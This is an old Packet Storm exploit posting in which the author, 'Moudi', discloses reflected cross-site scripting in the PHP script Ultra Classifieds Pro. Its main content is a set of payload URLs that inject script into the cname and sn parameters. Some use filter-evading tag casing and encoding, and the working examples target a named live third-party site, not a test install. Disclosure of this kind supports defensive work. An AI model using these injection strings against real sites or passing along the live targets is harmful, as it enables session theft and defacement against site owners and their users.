Lucene search

K
packetstormMoudiPACKETSTORM:79456
HistoryJul 21, 2009 - 12:00 a.m.

Ultra Classifieds Pro Cross Site Scripting

2009-07-2100:00:00
Moudi
packetstormsecurity.com
18
`###########################################################################  
#-----------------------------I AM MUSLIM !!------------------------------#  
###########################################################################  
  
==============================================================================  
_ _ _ _ _ _   
/ \ | | | | / \ | | | |  
/ _ \ | | | | / _ \ | |_| |  
/ ___ \ | |___ | |___ / ___ \ | _ |  
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|  
  
  
==============================================================================  
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]  
==============================================================================  
[»] Ultra Classifieds Pro Remote XSS Vulnerabilities  
==============================================================================  
  
[»] Script: [ Ultra Classifieds Pro ]  
[»] Language: [ PHP ]  
[»] Download: [ http://www.yourfreeworld.com/script/ultraclassifieds.php ]  
[»] Founder: [ Moudi <[email protected]> ]  
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]  
[»] Team: [ EvilWay ]  
[»] Dork: [ OFF ]  
[»] Price: [ $67 ]  
[»] Site : [ https://security-shell.ws/forum.php ]  
  
###########################################################################  
  
===[ Exploit XSS + LIVE : vulnerability ]===  
  
[»] http://www.site.com/patch/subclass.php?c=18&cname=[XSS]  
[»] http://www.site.com/patch/listads.php?c=69&cn=apartments&sn=[XSS]  
  
[»] http://www.downlinegoldmine.com/ultraclassifieds/subclass.php?c=18&cname=1<script>alert(308954043099)</script>  
[»] http://www.downlinegoldmine.com/ultraclassifieds/listads.php?c=69&cn=apartments&sn=1>"><ScRiPt %0A%0D>alert(317944247288)%3B</ScRiPt>  
  
  
Author: Moudi  
  
###########################################################################`